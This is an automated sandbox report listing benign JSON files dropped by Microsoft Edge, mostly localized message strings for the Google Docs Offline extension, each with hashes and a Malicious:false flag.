                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3107
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                                                                        MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                                                                        SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                                                                        SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                                                                        SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1389
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                                                                        MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                                                                        SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                                                                        SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                                                                        SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1763
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):930
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):913
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):806
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):883
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1031
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                                                                        MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                                                                        SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                                                                        SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1613
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                                                                        MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                                                                        SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                                                                        SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):848
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                                                                        MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                                                                        SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                                                                        SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1425
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                                                                        MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                                                                        SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                                                                        SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):961
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                                                                        MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                                                                        SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                                                                        SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):959
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                                                                        MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                                                                        SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                                                                        SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                                                                        SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):968
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                                                                        MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                                                                        SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                                                                        SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                                                                        SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):838
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                                                                        MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                                                                        SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                                                                        SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
